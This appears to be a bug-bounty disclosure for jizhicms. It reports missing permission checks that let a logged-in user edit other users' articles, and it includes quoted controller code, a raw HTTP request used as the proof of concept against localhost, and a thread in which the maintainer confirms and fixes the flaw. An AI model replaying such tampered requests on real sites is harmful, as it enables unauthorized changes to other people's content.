Modify other people's articles by modifying the data package in cherry-toto/jizhicms

Valid

Reported on

Aug 8th 2022


Description

The program does not check whether the originator of the request has this permission. I can modify the content of other people's articles and even modify the content by capturing data packets, even if I am not the owner of the article, even if I do not have permission in this respect

Proof of Concept

$data = $this->frparam();
            $data = get_fields_data($data,'article');
            if(!$this->frparam('seo_title',1) && $this->frparam('config_seotitle')==1){
                $data['seo_title'] = $data['title'];
            }
            if(!$this->frparam('description',1) && $this->frparam('config_description')==1){
                $data['description'] = newstr(strip_tags($data['body']),200);
            }
            if(!$this->frparam('litpic',1) && $this->frparam('config_litpic')==1){
                $pattern='/<img.*?src="(.*?)".*?>/is';
                if(!$this->frparam('body',1)){
                    $r = preg_match($pattern,$_POST['body'],$matchContent);
                    if($r){
                        $data['litpic'] = $matchContent[1];
                    }else{
                        $data['litpic'] = '';
                    }
                

#EXP // PoC.js var payload = ...

OST /user/release.html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 156
Origin: http://localhost
Connection: close
Referer: http://localhost/user/release.html
Cookie: PHPSESSID=pgbnunsra5bovtngp8g29ue7es

ajax=1&isshow=&molds=article&tid=1&title=test&keywords=jiafen&description=fefenef&litpic=&body=<p>wwwowota</p><p>woyaofen<br/></p>

Impact

The program does not check whether the initiator of the request has this permission. I can modify the content of other people's articles, or even the attribution, by capturing data packets

We are processing your report and will contact the cherry-toto/jizhicms team within 24 hours. a month ago
We have contacted a member of the cherry-toto/jizhicms team and are waiting to hear back a month ago
留恋风 validated this vulnerability a month ago

Thank you for your report. I will fix it in the next version!

breakalegcml has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the cherry-toto/jizhicms team. We will try again in 7 days. a month ago
留恋风 confirmed that a fix has been merged on e1abb4 a month ago
留恋风 has been awarded the fix bounty
breakalegcml
a month ago

Researcher


Hello, could you please apply for CVE

to join this conversation